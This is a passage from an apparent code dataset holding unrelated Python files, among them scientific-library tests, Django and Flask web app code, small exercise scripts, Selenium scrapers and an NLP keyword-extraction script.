{Spin.up: 0.10745},\n \"Bi5-Se12\": {Spin.up: -0.12395},\n \"Bi5-Bi6\": {Spin.up: 0.24714},\n \"Bi6-Se11\": {Spin.up: -0.12395}}\n all_coops_lobster = self.coop_lobster.all_cohps\n for bond in icoop_ef_dict:\n icoop_ef = all_coops_lobster[bond].get_interpolated_value(\n self.coop_lobster.efermi, integrated=True)\n self.assertEqual(icoop_ef_dict[bond], icoop_ef)\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","sub_path":"pymatgen/electronic_structure/tests/test_cohp.py","file_name":"test_cohp.py","file_ext":"py","file_size_in_byte":7792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"53830061","text":"from django.conf import settings\nfrom django.test import TestCase\nimport glob, os\n\nfrom .forms import RefunderForm\n\nclass NewRefundPageTest(TestCase):\n\n def test_uses_home_template(self):\n response = self.client.get('/')\n self.assertTemplateUsed(response, 'home.html')\n\n def test_uses_refunder_from(self):\n response = self.client.get('/')\n self.assertIsInstance(response.context['form'], RefunderForm)\n\nclass RefundPageTest(TestCase):\n\n def tearDown(self):\n for f in glob.glob(os.path.join(settings.BASE_DIR, 'refunder/files/*')):\n os.remove(f)\n \n def test_POST_to_refund_with_invalid_data_renders_new_refund_page(self):\n response = self.client.post('/refund')\n\n self.assertIn('What type of account is this?', (response.content).decode('utf-8'))\n self.assertIn('start_refund', (response.content).decode('utf-8'))\n\n def test_POST_with_invalid_keys_redirects_to_home_page(self):\n dummy_file = os.path.join(settings.BASE_DIR, 'functional_tests/dummy_source.csv')\n\n with open(dummy_file) as fp:\n response = self.client.post('/refund', {'environment': 'sandbox', 'merchant_id': 'asdf', 'public_key': 'asdf', 'private_key': 'asdf', 'source_csv': fp})\n\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'home.html')\n self.assertIn('start_refund', (response.content).decode('utf-8'))\n\n def test_POST_to_refund_with_valid_data_redirects_to_refunding_page(self):\n dummy_file = os.path.join(settings.BASE_DIR, 'functional_tests/dummy_source.csv')\n VALID_KEYS = [os.getenv(\"BT_ENVIRONMENT\"), os.getenv(\"BT_MERCHANT_ID\"), os.getenv(\"BT_PUBLIC_KEY\"), os.getenv(\"BT_PRIVATE_KEY\")] \n\n with open(dummy_file) as fp:\n response = self.client.post('/refund', {'environment': VALID_KEYS[0], 'merchant_id': VALID_KEYS[1], 'public_key': VALID_KEYS[2], 'private_key': VALID_KEYS[3], 'source_csv': fp})\n\n for f in glob.glob(os.path.join(settings.BASE_DIR, 'refunder/files/' + VALID_KEYS[1] + '*')):\n log_file_name = f\n\n self.assertRedirects(response, '/refunding/' + os.path.basename(log_file_name) + '/')\n\n","sub_path":"refunder/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"403459457","text":"n = [int(i) for i in input().split()]\n\nmin_n = n[0]\nmax_n = n[0]\n\nfor i in n:\n if i > max_n:\n max_n = i\n\n elif i < min_n:\n min_n = i\n\nmin_pos = n.index(min_n)\nmax_pos = n.index(max_n)\n\nn[min_pos] = max_n\nn[max_pos] = min_n\n\nprint(' '.join(str(i) for i in n))\n","sub_path":"students/stachowska_agata/lesson_05_lists/swap_min_and_max.py","file_name":"swap_min_and_max.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"14477941","text":"# db05.py\n\nimport sqlite3\nprint(\"번호,이름을 입력하세요\")\nno, name = input('---> ').split(',')\ndbcon = sqlite3.connect('test01.db')\ncursor = dbcon.cursor()\n###########################################\nsql = '''update T1 set name = ? where no = ? 
'''\ncursor.execute(sql,(name,int(no)))\ndbcon.commit()\n###########################################\ncursor.close()\ndbcon.close()\nprint(\"실행 완료\")\n\n\n","sub_path":"5day/db/db05.py","file_name":"db05.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"225323464","text":"#\n# Class for two-dimensional current collectors\n#\nimport pybamm\nfrom .base_current_collector import BaseModel\n\n\nclass SingleParticlePotentialPair(BaseModel):\n \"\"\"A submodel for Ohm's law plus conservation of current in the current collectors,\n which uses the voltage-current relationship from the SPM(e).\n\n Parameters\n ----------\n param : parameter class\n The parameters to use for this submodel\n\n\n **Extends:** :class:`pybamm.current_collector.BaseModel`\n \"\"\"\n\n def __init__(self, param):\n super().__init__(param)\n\n def get_fundamental_variables(self):\n\n phi_s_cn = pybamm.standard_variables.phi_s_cn\n phi_s_cp = pybamm.standard_variables.phi_s_cp\n\n variables = self._get_standard_potential_variables(phi_s_cn, phi_s_cp)\n\n # TO DO: grad not implemented for 2D yet\n i_cc = pybamm.Scalar(0)\n i_boundary_cc = pybamm.standard_variables.i_boundary_cc\n\n variables.update(self._get_standard_current_variables(i_cc, i_boundary_cc))\n\n return variables\n\n def set_algebraic(self, variables):\n\n param = self.param\n\n ocp_p_av = variables[\"Average positive electrode open circuit potential\"]\n ocp_n_av = variables[\"Average negative electrode open circuit potential\"]\n eta_r_n_av = variables[\"Average negative electrode reaction overpotential\"]\n eta_r_p_av = variables[\"Average positive electrode reaction overpotential\"]\n eta_e_av = variables[\"Average electrolyte overpotential\"]\n delta_phi_s_n_av = variables[\"Average negative electrode ohmic losses\"]\n delta_phi_s_p_av = variables[\"Average positive electrode ohmic losses\"]\n\n phi_s_cn = variables[\"Negative current collector potential\"]\n phi_s_cp = variables[\"Positive current collector potential\"]\n i_boundary_cc = variables[\"Current collector current density\"]\n v_boundary_cc = variables[\"Local current collector potential difference\"]\n\n # The voltage-current expression from the SPM(e)\n local_voltage_expression = (\n ocp_p_av\n - ocp_n_av\n + eta_r_p_av\n - eta_r_n_av\n + eta_e_av\n + delta_phi_s_p_av\n - delta_phi_s_n_av\n )\n\n self.algebraic = {\n phi_s_cn: pybamm.laplacian(phi_s_cn)\n - (param.sigma_cn * param.delta ** 2 / param.l_cn)\n * pybamm.source(i_boundary_cc, phi_s_cn),\n phi_s_cp: pybamm.laplacian(phi_s_cp)\n + (param.sigma_cp * param.delta ** 2 / param.l_cp)\n * pybamm.source(i_boundary_cc, phi_s_cp),\n i_boundary_cc: v_boundary_cc - local_voltage_expression,\n }\n\n def set_boundary_conditions(self, variables):\n\n phi_s_cn = variables[\"Negative current collector potential\"]\n phi_s_cp = variables[\"Positive current collector potential\"]\n\n param = self.param\n applied_current = param.current_with_time\n\n pos_tab_bc = -applied_current / (\n param.sigma_cp * param.delta ** 2 * param.l_tab_p * param.l_cp\n )\n\n self.boundary_conditions = {\n phi_s_cn: {\n \"left\": (pybamm.Scalar(0), \"Dirichlet\"),\n \"right\": (pybamm.Scalar(0), \"Neumann\"),\n },\n phi_s_cp: {\n \"left\": (pybamm.Scalar(0), \"Neumann\"),\n \"right\": (pos_tab_bc, \"Neumann\"),\n },\n }\n\n return variables\n\n def set_initial_conditions(self, variables):\n\n param = self.param\n applied_current = param.current_with_time\n phi_s_cn = 
variables[\"Negative current collector potential\"]\n phi_s_cp = variables[\"Positive current collector potential\"]\n i_boundary_cc = variables[\"Current collector current density\"]\n\n self.initial_conditions = {\n phi_s_cn: pybamm.Scalar(0),\n phi_s_cp: param.U_p(param.c_p_init, param.T_ref)\n - param.U_n(param.c_n_init, param.T_ref),\n i_boundary_cc: applied_current / param.l_y / param.l_z,\n }\n","sub_path":"pybamm/models/submodels/current_collector/single_particle_current_collector.py","file_name":"single_particle_current_collector.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"159551424","text":"from utils.GraphUtils import deep_grapher\nfrom utils.GraphUtils import graph_painter\nfrom utils.ArgMatcher import argmapper\nimport re\nfrom loaders.PMLoader import PMLoader as pm\n\n\ndef DB_PM_converter(deepbank):\n print(\"===================Start Deepbank-Predicate Matrix Matching===================\")\n argmapper.read(\".\\\\arg_matcher\")\n for sent in deepbank.keys():\n head, nodes, start_list, verb_list = deep_grapher(deepbank[sent][\"nodes\"], deepbank[sent][\"head\"],\n require_verb=True)\n reserve = False\n for node in verb_list:\n if node.cls.find(\"_v_\") != -1:\n if argmapper.getPBG(node.cls):\n if re.match(\"fn.\", pm.getFrame(argmapper.getPBG(node.cls))):\n reserve = True\n pbg = argmapper.getPBG(node.cls)\n for edge in node.succ:\n pbr = argmapper.getPBR(node.cls + \"-\" + edge[0])\n if pbr:\n if re.match(\"fn.\", pm.getFE(pbg, pbr)):\n edge[0] = pm.getFE(pbg, pbr)\n node.cls += \"-\" + pm.getFrame(pbg)\n\n if reserve:\n nodes_painter = []\n edges_painter = []\n for handle in nodes.keys():\n node = nodes[handle]\n if node.name is None:\n nodes_painter.append((handle, node.cls))\n else:\n nodes_painter.append((handle, node.cls + \"(\" + node.name + \")\"))\n for edge in node.succ:\n edges_painter.append((edge[0], handle, edge[1].handle))\n graph_painter(sent, deepbank[sent][\"src\"], nodes_painter, edges_painter)\n","sub_path":"backup/v2.0/utils/Converter.py","file_name":"Converter.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"493282280","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\nimport os\nimport unittest\nimport Nio as nio\n\nimport storage.files as files\n\n\nclass TestGetVariableByType(unittest.TestCase):\n\n def setUp(self):\n self.badFilename = '/tmp/fail.txt'\n self.missingVariable = 'missing'\n\n def testNioRaisesException(self):\n with self.assertRaises(Exception):\n files.getVariableByType(self.badFilename, 'time')\n \n def testTimeVariableNames(self):\n self.variableList = files.VARIABLE_NAMES['time']\n for variable in self.variableList:\n testFile = self.makeNioFile(variable)\n timeVariable = files.getVariableByType(testFile, 'time')\n os.remove(testFile)\n self.assertEqual(timeVariable, variable)\n \n def testLatitudeVariableNames(self):\n self.variableList = files.VARIABLE_NAMES['latitude']\n for variable in self.variableList:\n testFile = self.makeNioFile(variable)\n timeVariable = files.getVariableByType(testFile, 'latitude')\n os.remove(testFile)\n self.assertEqual(timeVariable, variable)\n\n def testLongitudeVariableNames(self):\n self.variableList = files.VARIABLE_NAMES['longitude']\n for variable in self.variableList:\n testFile = self.makeNioFile(variable)\n timeVariable = files.getVariableByType(testFile, 'longitude')\n os.remove(testFile)\n self.assertEqual(timeVariable, variable)\n\n def testTimeVariableMissing(self):\n testFile = self.make5VariableNioFile()\n testVariable = files.getVariableByType(testFile, 'time')\n os.remove(testFile)\n self.assertEqual(len(testVariable), 5)\n \n def makeNioFile(self, variableName):\n filename = '/tmp/good_%s.nc' % variableName\n f = nio.open_file(filename, 'w')\n f.create_dimension('test_dimension', 1)\n f.create_variable(variableName,'l',('test_dimension',))\n f.close()\n return filename\n \n def make5VariableNioFile(self):\n filename = '/tmp/5_variables.nc'\n f = nio.open_file(filename, 'w')\n f.create_dimension('dimension_one', 1)\n f.create_variable('one', 'l', ('dimension_one',))\n f.create_variable('two', 'l', ('dimension_one',))\n f.create_variable('three', 'l', ('dimension_one',))\n f.create_variable('four', 'l', ('dimension_one',))\n f.create_variable('five', 'l', ('dimension_one',))\n f.close()\n return filename\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"rcmet/src/main/python/tests/test_files.py","file_name":"test_files.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"194642800","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\n\ndef make_section_url(num):\n url1 = \"https://www.incometaxindia.gov.in/_layouts/15/dit/Pages/viewer.aspx?grp=Act&cname=CMSID&cval=\"\n url2 = '&searchFilter=[{\"CrawledPropertyKey\":1,\"Value\":\"Act\",\"SearchOperand\":2},{\"CrawledPropertyKey\":0,\"Value\":\"Income-tax Act, 1961\",\"SearchOperand\":2},{\"CrawledPropertyKey\":29,\"Value\":\"2021\",\"SearchOperand\":2}]&k=&IsDlg=0'\n url = url1 + num + url2\n return url\n\n\nclass Section:\n def __init__(self, section_number, section_title, section_text):\n self.section_number = section_number\n self.section_code = 0\n self.section_text = section_text\n self.section_title = section_title\n\n def get_section_text(self):\n driver = webdriver.Firefox()\n driver.get(url=make_section_url(self.section_code))\n div = driver.find_element_by_class_name(\"viewerContent\")\n print(div.text)\n driver.quit()\n return div.text\n\n def set_section_text(self, text):\n 
self.section_text = text\n\n    def display(self):\n        print(f\"Section - {self.section_number}\")\n        print(f\"Title - {self.section_title}\")\n        # print(self.section_text)\n","sub_path":"section.py","file_name":"section.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"602027314","text":"#!/Users/lyjsmac/opt/anaconda3/bin/python3.8\n# -*- encoding: utf-8 -*-\n'''\n@File    :   两数之和.py\n@Time    :   2021/1/4 10:45 上午\n@Author  :   little_carp\n@Contact :   woshiliyujian@gmail.com\n@Desc    :   None\n'''\n\n# here put the import lib\n'''\n给定一个整数数组 nums和一个整数目标值 target,请你在该数组中找出 和为目标值 的那两个整数,并返回它们的数组下标。\n\n你可以假设每种输入只会对应一个答案。但是,数组中同一个元素不能使用两遍。\n\n你可以按任意顺序返回答案。\n\n\n\n示例 1:\n\n输入:nums = [2,7,11,15], target = 9\n输出:[0,1]\n解释:因为 nums[0] + nums[1] == 9 ,返回 [0, 1] 。\n\n'''\nclass Solution:\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n        # 最终返回的是x 和y的索引位置\n        hash_map={}\n        for loc,num in enumerate(nums):\n            hash_map[num] = loc\n        for i ,num in enumerate(nums):\n            j = hash_map.get(target-num)\n            if j is not None and i != j:\n                return[i,j]\n","sub_path":"Week_05/两数之和.py","file_name":"两数之和.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"32226444","text":"# -*- encoding: utf-8 -*-\n\nfrom Projects.JJLAutoTest.Base.JJLAutoTest import JJLAutoTest\nfrom Projects.JJLAutoTest.Pages.InstitutionHomePage import InstitutionHomePage\nfrom Core.Decorator import test_case\nfrom DB.DBFactory import DBFactory\nfrom Core.ConfigOperation import ConfigOperation\nfrom Core.Log import log\nimport time\n\n@test_case\ndef institution_home_review(*args, **kwargs):\n    \"\"\"\n    机构信息编辑提交审核\n    :param args: 0: project\n    :param kwargs:\n    institution_name:机构名称\n    contact_name:联系人名称\n    contact_mobile:联系电话\n    contact_address:联系地址\n    business_image:营业执照\n    other_image:委托授权书\n    :return:\n    \"\"\"\n    # page初始化\n    uh = InstitutionHomePage(args[0])\n    user_url = 'http://org.dxzjjl.cn/org-center'\n    # Mysql初始化\n    env = 'AUTO'\n    config = ConfigOperation().load_config('./Projects/JJLAutoTest/Base/config.ini')\n    db = DBFactory().get_db_instance(db_type='Mysql', config=config, env=env)\n    db.__connection__()\n    # 1.打开机构院校首页\n    uh.JJLAutoTest.open_url(user_url)\n    # 2.输入待审核信息\n    ch_name_input = uh.institution_name_input.get_attribute('placeholder')\n    ch_contact_name_input = uh.institution_contact_name_input.get_attribute('placeholder')\n    ch_contact_mobile_input = uh.institution_contact_mobile_input.get_attribute('placeholder')\n    ch_contact_address_input = uh.institution_contact_address_input.get_attribute('placeholder')\n    uh.set_institution_name_input_action(kwargs['institution_name'])\n    uh.set_institution_contact_name_input_action(kwargs['contact_name'])\n    uh.set_institution_contact_mobile_input_action(kwargs['contact_mobile'])\n    uh.set_institution_contact_address_input_action(kwargs['contact_address'])\n    # 上传营业执照\n    uh.set_institution_business_license_push_input_action(kwargs['business_image'])\n    # 上传委托授权书\n    uh.set_institution_business_other_push_input_action(kwargs['other_image'])\n    uh.JJLAutoTest.wait_until(uh._institution_attorney_picture_tag)\n    # 点击提交审核\n    uh.click_institution_submit_review_button_action()\n    # 提交成功标志\n    # uh.JJLAutoTest.wait_until(uh._message_content_tag)\n    success_content = uh.message_content.get_attribute('textContent')\n    # 信息验证\n    result = {'ch_name_input': ch_name_input,\n              'ch_contact_name_input': ch_contact_name_input,\n              'ch_contact_mobile_input': 
ch_contact_mobile_input,\n 'ch_contact_address_input': ch_contact_address_input,\n 'success_content': success_content\n }\n\n return result","sub_path":"Projects/JJLAutoTest/TestCases/InstitutionHomeReview.py","file_name":"InstitutionHomeReview.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"437835347","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom callreplayapp import views\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', views.home, name='home'),\n url(r'^voice/$', views.voice, name='voice'),\n url(r'^respond/$', views.respond, name='respond'),\n url(r'^replay/(?P<pk>[0-9]+)/$', views.replay, name='replay'),\n url(r'^read/(?P<digits>[0-9]+)/', views.read, name='read')\n\n]\n","sub_path":"phonebuzz4/phonebuzz4/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117100975","text":"import pke\nfrom textblob import TextBlob\nimport unicodedata\nimport nltk\nimport re\nimport inflect\n\nfrom gensim.summarization import summarize\nfrom gensim.summarization import keywords\n\n\ndef main():\n filename_rare = '../data_storage/articles_txt/facebook_ceo/facebook_ceo_rare.txt'\n filename_norm = '../data_storage/articles_txt/facebook_ceo/facebook_ceo.txt'\n\n rare_data = load_data(filename_rare)\n\n summary = summarize(rare_data)\n\n print(keywords(summary))\n\n\n # analyse_sentiment(rare_data)\n\n # normalized_data = normalize_text(rare_data)\n\n # save_data(filename_norm, normalized_data)\n\n\n\n# # # ==================================\n\n\n# print('\\n')\n# # define the set of valid Part-of-Speeches\n# pos = {'NOUN', 'PROPN', 'ADJ'}\n\n# # 1. create a TextRank extractor.\n# extractor = pke.unsupervised.TextRank()\n\n# # 2. load the content of the document.\n# extractor.load_document(input=FILENAME_RARE,\n# language='en',\n# normalization=None)\n\n# # 3. build the graph representation of the document and rank the words.\n# # Keyphrase candidates are composed from the 33-percent\n# # highest-ranked words.\n# extractor.candidate_weighting(window=3,\n# pos=pos,\n# top_percent=0.33, normalized=False)\n\n# # 4. 
get the 10-highest scored candidates as keyphrases\n# keyphrases = extractor.get_n_best(n=20)\n\n\n# print('\\n')\n# for keyphrase in keyphrases:\n# analyser = TextBlob(keyphrase[0])\n# print(keyphrase[0], ' = ', analyser.sentiment.polarity)\n\n# ===============================\n\ndef load_data(filename):\n file_id = open(filename)\n data = file_id.read()\n file_id.close()\n\n return data\n\ndef save_data(filename, data):\n file_id=open(filename, 'w')\n file_id.write(' '.join(data))\n file_id.close()\n\n# ===============================\n\ndef normalize_text(rare_text):\n # Each word as array element\n words_array = rare_text.split()\n\n words_array = remove_non_ascii(words_array)\n words_array = change_to_lowercase(words_array)\n words_array = remove_punctuation(words_array)\n words_array = replace_numbers(words_array)\n words_array = remove_stopwords(words_array)\n words_array = stem_words(words_array)\n print(words_array[:100])\n\n words_array = lemmatize_verbs(words_array)\n\n return words_array\n\ndef remove_non_ascii(words):\n \"\"\"Remove non-ASCII characters from list of tokenized words\"\"\"\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n\n return new_words\n\ndef change_to_lowercase(words):\n \"\"\"Convert all characters to lowercase from list of tokenized words\"\"\"\n new_words = []\n for word in words:\n new_word = word.lower()\n new_words.append(new_word)\n\n return new_words\n\ndef remove_punctuation(words):\n \"\"\"Remove punctuation from list of tokenized words\"\"\"\n new_words = []\n for word in words:\n new_word = re.sub(r'[^\\w\\s]', '', word)\n if new_word != '':\n new_words.append(new_word)\n\n return new_words\n\ndef replace_numbers(words):\n \"\"\"Replace all interger occurrences in list of tokenized words with textual representation\"\"\"\n p = inflect.engine()\n new_words = []\n for word in words:\n if word.isdigit():\n new_word = p.number_to_words(word)\n new_words.append(new_word)\n else:\n new_words.append(word)\n return new_words\n\ndef remove_stopwords(words):\n \"\"\"Remove stop words from list of tokenized words\"\"\"\n new_words = []\n for word in words:\n if word not in nltk.corpus.stopwords.words('english'):\n new_words.append(word)\n return new_words\n\ndef stem_words(words):\n \"\"\"Stem words in list of tokenized words\"\"\"\n stemmer = nltk.stem.LancasterStemmer()\n stems = []\n for word in words:\n stem = stemmer.stem(word)\n stems.append(stem)\n return stems\n\ndef lemmatize_verbs(words):\n \"\"\"Lemmatize verbs in list of tokenized words\"\"\"\n lemmatizer = nltk.stem.WordNetLemmatizer()\n lemmas = []\n for word in words:\n lemma = lemmatizer.lemmatize(word, pos='v')\n lemmas.append(lemma)\n\n return lemmas\n\n# ===============================\n\ndef analyse_sentiment(data):\n analyser = TextBlob(data)\n print(analyser.sentiment)\n\nmain()","sub_path":"src/diploma_project/nlp_module/text_rank.py","file_name":"text_rank.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"466250884","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('project_info', '0013_auto_20141127_1229'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contact',\n fields=[\n ('id', models.AutoField(verbose_name='ID', 
serialize=False, auto_created=True, primary_key=True)),\n ('contact_name', models.CharField(max_length=40)),\n ('contact_email', models.EmailField(max_length=75)),\n ('telephone_number', models.DecimalField(max_digits=15, decimal_places=0)),\n ('address', models.CharField(max_length=200)),\n ('project_email', models.EmailField(max_length=75)),\n ('institutions', models.TextField()),\n ('map', models.ImageField(upload_to=b'')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"project_info/migrations/0014_contact.py","file_name":"0014_contact.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"372131963","text":"from scipy import fft\nfrom numpy import *\nfrom matplotlib.pyplot import *\nimport pdb\ndef plotgr(vf):\n '''the realtion between vf and nonlocality.'''\n N=500\n k=linspace(-pi,pi,N)\n gk=sqrt(1+vf**2)/(1-vf*k+1j*1e-2)\n gr=fft.ifft(gk)\n plot(arange(N),gr.real)\n ylim(-2,2)\n show()\n\ndef Uas(n,reverse=False):\n '''U is pulse like in realspace.'''\n if n==0:\n return -0.5 if reverse else 0.5\n return -1.j*(1-exp(1j*pi*n))/(2*pi*n)\n\ndef plotUas():\n N=200\n Nx=100\n x=linspace(0,1,Nx)\n nl=arange(-N,N+1)\n res=zeros(Nx,dtype=complex128)\n for n in nl:\n res+=exp(2j*pi*n*x)*Uas(n)\n plot(x,res.real)\n show()\n","sub_path":"topochain/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"586096874","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@author: CityNorth\n@file: common.py\n@time: 2020/11/30 15:01\n@desc: \n\"\"\"\n\nimport hashlib\n\ndef get_md5(url):\n if isinstance(url,str):\n url = url.encode(\"utf-8\")\n m = hashlib.md5()\n m.update(url)\n return m.hexdigest()\n\nif __name__ == \"__main__\":\n print(get_md5(\"https://news.cnblogs.com/n/page/17/\"))","sub_path":"AricelSpider/AricelSpider/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"118836338","text":"from flask import Flask, render_template, jsonify, request\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nimport requests\n\n\napp = Flask(__name__)\n\nclient = MongoClient('localhost', 27017) # mongoDB는 27017 포트로 돌아갑니다.\ndb = client.dbsparta # 'dbsparta'라는 이름의 db를 만듭니다.\n\n\n## HTML을 주는 부분\n@app.route('/')\ndef home():\n return render_template('/index.html')\n\n@app.route('/memo', methods=['GET'])\ndef listing():\n # 1. 모든 document 찾기 & _id 값은 출력에서 제외하기\n articles = list(db.articles.find({}, {'_id': False}))\n \n # 2. articles라는 키 값으로 영화정보 내려주기\n return jsonify({\n 'result':'success',\n 'msg':'GET 연결되었습니다!',\n 'articles':articles\n })\n\n## API 역할을 하는 부분\n@app.route('/memo', methods=['POST'])\ndef saving():\n\t\t# 1. 클라이언트로부터 데이터를 받기\n posting_url = request.form['posting_url']\n posting_comment = request.form['posting_comment']\n\n print(posting_url, posting_comment)\n \n\t\t# 2. 
meta tag를 스크래핑하기\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n data = requests.get(posting_url, headers=headers)\n soup = BeautifulSoup(data.text, 'html.parser')\n\n og_image = soup.select_one('meta[property=\"og:image\"]')\n og_title = soup.select_one('meta[property=\"og:title\"]')\n og_description = soup.select_one('meta[property=\"og:description\"]')\n\n article = {\n 'url': posting_url,\n 'comment': posting_comment,\n 'image': og_image['content'],\n 'title': og_title['content'],\n 'desc': og_description['content']\n }\n\n print(article)\n db.articles.insert_one(article)\n\n return jsonify({'result': 'success', 'msg':'POST 연결되었습니다!'})\n\t\t# 3. mongoDB에 데이터 넣기\n\nif __name__ == '__main__':\n app.run('0.0.0.0',port=5004,debug=True)","sub_path":"9Day/memo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"162584504","text":"from django.conf.urls import url\nfrom api.views import MovieCreateView, MovieDetailView, ReferencesView, ReferencesDetailView, controlReference, EditorReferencesView, \\\n TranslateReferencesView, ThesisReferencesView, BrochureReferencesView, AudioVisualReferencesView, DatabaseReferencesView, \\\n EncyclopediaReferencesView, MessageFromForumReferencesView, WebsiteReferencesView, NoAuthorReferencesView, SourceView, \\\n SourceDetailView, controlSource, getallthesisname, getalltitleofreferences\nurlpatterns = [\n url(r'^movies/$', MovieCreateView.as_view(), name='movies'),\n url(r'^references/$', ReferencesView.as_view(), name='movies'),\n url(r'^editorreferences/$', EditorReferencesView.as_view(), name='movies'),\n url(r'^translatereferences/$', TranslateReferencesView.as_view(), name='movies'),\n url(r'^thesisreferences/$', ThesisReferencesView.as_view(), name='movies'),\n url(r'^brochurereferences/$', BrochureReferencesView.as_view(), name='movies'),\n url(r'^audiovisualreferences/$', AudioVisualReferencesView.as_view(), name='movies'),\n url(r'^databasereferences/$', DatabaseReferencesView.as_view(), name='movies'),\n url(r'^encyclopediareferences/$', EncyclopediaReferencesView.as_view(), name='movies'),\n url(r'^messagefromforumreferences/$', MessageFromForumReferencesView.as_view(), name='movies'),\n url(r'^websitereferences/$', WebsiteReferencesView.as_view(), name='movies'),\n url(r'^noauthorreferences/$', NoAuthorReferencesView.as_view(), name='movies'),\n url(r'^source/$', SourceView.as_view(), name='movies'),\n url(r'^sourceControl/$', controlSource, name='movies'),\n url(r'^getallthesisname/$', getallthesisname, name='movies'),\n url(r'^getalltitleofreferences/$', getalltitleofreferences, name='movies'),\n url(r'^source/(?P<id>[0-9]+)$', SourceDetailView.as_view(), name='detail'),\n url(r'^movies/(?P<id>[0-9]+)$', MovieDetailView.as_view(), name='detail'),\n url(r'^references/(?P<id>[0-9]+)$', ReferencesDetailView.as_view(), name='detail'),\n url(r'^controlReference/', controlReference),\n]","sub_path":"movies/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"196636271","text":"from flask import (\n Blueprint,\n flash,\n redirect,\n request,\n url_for)\n\nfrom app.blueprints.contact.forms import ContactForm\n\ncontact = Blueprint('contact', __name__, template_folder='templates')\n\n@contact.route('/contact', 
methods=['GET', 'POST'])\ndef index():\n\n form = ContactForm( request.form ) # Create a new contact form\n if form.validate_on_submit(): # Differentiates between GET/POST request\n from app.blueprints.contact.tasks import deliver_contact_email\n\n\n email = request.form['email']\n message = request.form['message']\n\n deliver_contact_email.delay(email, message)\n # Log\n print(f\"contact.index Success. email={email} message={message}\")\n\n # flash(\"Thanks, we'll be in touch shortly.\", 'success')\n return \"form sucessfully submitted\"\n else:\n return form.get_errors(), 400\n","sub_path":"server/app/blueprints/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"416306471","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 9 09:18:47 2020\r\n\r\n@author: pulme\r\n\"\"\"\r\n\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport random as 